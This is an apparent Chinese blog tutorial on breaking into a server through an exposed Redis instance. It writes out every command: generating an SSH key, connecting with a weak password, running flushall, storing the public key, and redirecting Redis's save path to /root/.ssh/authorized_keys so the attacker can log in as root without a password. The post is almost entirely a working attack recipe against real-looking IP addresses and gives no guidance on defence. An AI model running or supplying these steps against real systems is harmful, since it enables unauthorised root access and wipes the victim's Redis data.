Redis远程漏洞-ssh公钥无密码入侵服务器
通过redis入侵服务器的原理是:
利用了redis默认配置,许多用户没有设置访问的key。
然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。
通过redis入侵服务器的步骤:
环境准备
服务器A:39.106.2.93
服务器B:120.78.198.173
一,生成本地ssh公钥【39.106.2.93】
生成公钥:
复制公钥文件:
1 | (echo -e "\n\n" ; cat /root/.ssh/id_rsa.pub; echo -e "\n\n" ) > key.txt |
二、远程连接redis
1 | ./redis-cli -h 120.78.198.173 -a hello |
三、清空redis
1 2 | 120.78.198.173:6379> flushall OK |
四、向redis写自己的公钥
1 | cat key.txt | redis-cli -h 120.78.198.173 -a hello -x set redis |
查看设置的redis公钥值:
1 2 3 4 5 6 | [root@zhxi_3m bin]# ./redis-cli -h 120.78.198.173 -a hello Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe. 120.78.198.173:6379> keys * 1) "redis" 120.78.198.173:6379> get redis "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAJSk0rxWbE0Gp0WgjCSXWXpE3gLa4M9fQ/sZR5Vv4Nce3nZ0lTNoiEpEMsiPsWaVp7GEZ4sPpe2COU+nYat/KruCPahzR4NDtweGbwqcPxT+t/N3NOA3KAHkHBPyU6wk9/p7XWmfnXixCs0gOLvh7p6PTvH+Zcfgb+6Co0dHDszN6wAjgAidoHzkJbI70EPhol8WLiCWlhtz5jZdkROF5gdz4xUZWPVZk2OHXCyRPAITeKCSCZNa2LAwBMOWqcMrEIz7NJdrLLJiNA/ad1OkAz/QQHRtt root@zhxi_3m\n\n\n\n" |
五、利用redis写入key到本地文件
#写入配置库的路径及存放位置
1 | CONFIG SET dir "/root/.ssh/" |
#写入配置库名称及存放的名字
1 | CONFIG SET dbfilename "authorized_keys" |
写入
1 | save |
退出
1 | exit |
六、远程连接服务器
1 | ssh root@120.78.198.173 |
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 【杭电多校比赛记录】2025“钉耙编程”中国大学生算法设计春季联赛(1)
2021-01-22 2、Spring项目的创建【官网跟IDEA】
2021-01-22 1、了解SpringBoot
2021-01-22 JavaScript模拟网页时钟